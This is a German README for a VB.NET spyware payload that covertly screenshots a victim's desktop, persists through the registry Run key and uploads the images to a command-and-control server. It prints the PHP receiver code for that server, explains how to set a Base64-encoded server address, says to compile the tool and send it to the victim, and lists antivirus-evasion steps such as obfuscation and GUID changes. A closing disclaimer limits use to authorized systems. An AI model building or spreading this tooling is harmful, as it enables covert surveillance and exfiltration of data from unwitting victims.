Mr.Peter

Stille Screenshot-Aufnahme | Post-Exploitation-Nutzlast | VB.NET

Eine einfache Nutzlast, um einen Screenshot des Desktops des Opfers zu erstellen und ihn auf das C&C hochzuladen.

• Persistent (unter Verwendung des Registrierungs-Ausführungsschlüssels)
• Funktioniert im Hintergrund
• Weniger Code, weniger Fehler und weniger Erkennung ;)
• Löscht den Screenshot von der Festplatte, nachdem er auf C&C hochgeladen wurde
• C&C-Server in Base64
• Laden Sie Screenshots organisiert auf C&C hoch
• Keine Portweiterleitung erforderlich! funktioniert mit einer einzigen PHP-Datei
• [TODO] Maschineninformationen
• [TODO] Verschlüsselung
• [TODO] Intervall aus der Ferne über C&C einstellen

• Klonen Sie dieses Repository.
• Als Webhosting empfehle ich namecheap
• Gehen Sie zu Ihrem public_html-Ordner, erstellen Sie eine neue PHP-Datei und fügen Sie den folgenden Code ein

 <?php
$del = $_GET["dellog"];
$folder = $_GET["folder"];
mkdir($folder,0777);
$file = $_GET["path"];
if (!empty($_FILES["file"])){
move_uploaded_file($_FILES["file"]["tmp_name"],
      $file . "/" . $_FILES["file"]["name"]);
}
unlink($del);
?>

• Öffnen Sie das Projekt in Visual Studio und bearbeiten Sie die Variable unten im Quellcode

 Dim server As String = BaseDecode1("your server address here in base64 encoded") 

• und bearbeiten Sie auch diese Variable unten

 Dim php As String = "yourphpfilename.php?" & "folder="

• Kompilieren Sie es einfach und senden Sie es an das Opfer, das ist alles!!

Um die Antiviren-Erkennung zu vermeiden

• Ändern Sie das App-Symbol
• Neue GUID generieren
• Ändert alle Variablen
• Verschleiern Sie den Code mit Obfuscar
• Ändern Sie die Assembly-Informationen

Wenn dieses Tool für Sie nützlich war, können Sie sich gerne bei mir bedanken, indem Sie mir einen Kaffee spendieren :)

Dieses Tool darf nur auf autorisierten Systemen verwendet werden. Jede unbefugte Nutzung dieses Tools ohne ausdrückliche Genehmigung ist illegal.

GNU ALLGEMEINE ÖFFENTLICHE LIZENZ